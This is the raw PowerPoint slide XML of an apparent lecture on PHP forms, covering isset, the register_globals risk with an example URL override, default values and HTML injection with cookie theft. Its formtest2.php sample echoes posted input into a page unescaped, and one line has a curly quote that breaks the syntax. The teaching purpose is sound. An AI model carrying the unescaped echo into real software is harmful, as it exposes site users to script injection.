            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>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formtest2.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($_POST['name'])) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		$name = $_POST['name’];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	else $name = "(Not entered)";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	echo &lt;&lt;&lt;_END</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		&lt;head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			&lt;title&gt;Form Test&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		&lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			Your name is: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;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&lt;form method="post" action="formtest2.php"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>				What is your name?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>				&lt;input type="text" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name="name"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>				&lt;input type="submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_END;</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9A5B4DFA-609A-490F-8329-630DC0E319D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7235252" y="1037192"/>
            <a:ext cx="4412105" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> function is used to test whether </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_POST['name'] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>has been assigned a value.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378290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b="1" dirty="0" err="1"/>
              <a:t>register_globals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Before security became such a big issue, the default behavior of PHP was to assign the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>arrays directly to PHP variables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, there would be no need to use the instruction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$name=$_POST['name']; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>because $name would already be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>given that value automatically by PHP at the program start!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initially (prior to version 4.2.0 of PHP), this seemed a very useful idea that saved a lot of extra code writing, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>this practice has now been discontinued and the feature is disabled by default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOTE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Should you find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>register_globals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>enabled on a production web server for which you are developing, you should urgently </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>ask your server administrator to disable it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1078115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err="1"/>
              <a:t>register_globals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So why disable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>register_globals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>It enables anyone to enter a Get input on the tail of a URL, like this: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://myserver.com?override=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If your code were ever to use the variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$override </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and you forgot to initialize it (for example, with the statement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$override=0;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), the program could be compromised by such an exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In fact, because many installations on the Web still have this gaping hole, I advise you to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>always initialize every variable you use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, just in case your code will ever run on such a system. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="419559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Default Values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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sometimes it’s convenient to offer your site visitors a default value in a web form. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, suppose you put up a loan repayment calculator widget on a real estate website. It could make sense to enter default values of, say, 25 years and 6 percent interest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;form method="post" action="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>calc.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;pre&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		Loan Amount &lt;input type="text" name="principle"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	    Monthly Repayment &lt;input type="text" name="monthly"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	           Number of Years &lt;input type="text" name="years" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value="25"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		  Interest Rate &lt;input type="text" name="rate" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value="6"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			          &lt;input type="submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/pre&gt;&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4265821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Default Values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923499"/>
            <a:ext cx="10515600" cy="4867043"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With sensible default values, you can often make your web forms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>more user-friendly by minimizing unnecessary typing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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&lt;form method="post" action="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>calc.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;pre&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		Loan Amount &lt;input type="text" name="principle"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	    Monthly Repayment &lt;input type="text" name="monthly"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	           Number of Years &lt;input type="text" name="years" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value="25"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		  Interest Rate &lt;input type="text" name="rate" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value="6"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			          &lt;input type="submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/pre&gt;&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2783570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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Preventing HTML Injection</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p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This occurs when you allow HTML, or more often JavaScript code, to be input by a user and then displayed back by your website. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is common in a comment form </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What happens most often is that a malicious user will try to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>write code that steals cookies from your site’s users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, allowing him or her to discover username and password pairs or other information. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even worse, the malicious user might launch an attack to download a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> onto a user’s computer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217501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501445" y="1683659"/>
            <a:ext cx="11164529" cy="5058229"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Text boxes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The input type you will probably use most often is the text box. It accepts a wide range of alphanumeric text and other characters in a single-line box. The general format of a text box input is as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;input type="text" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
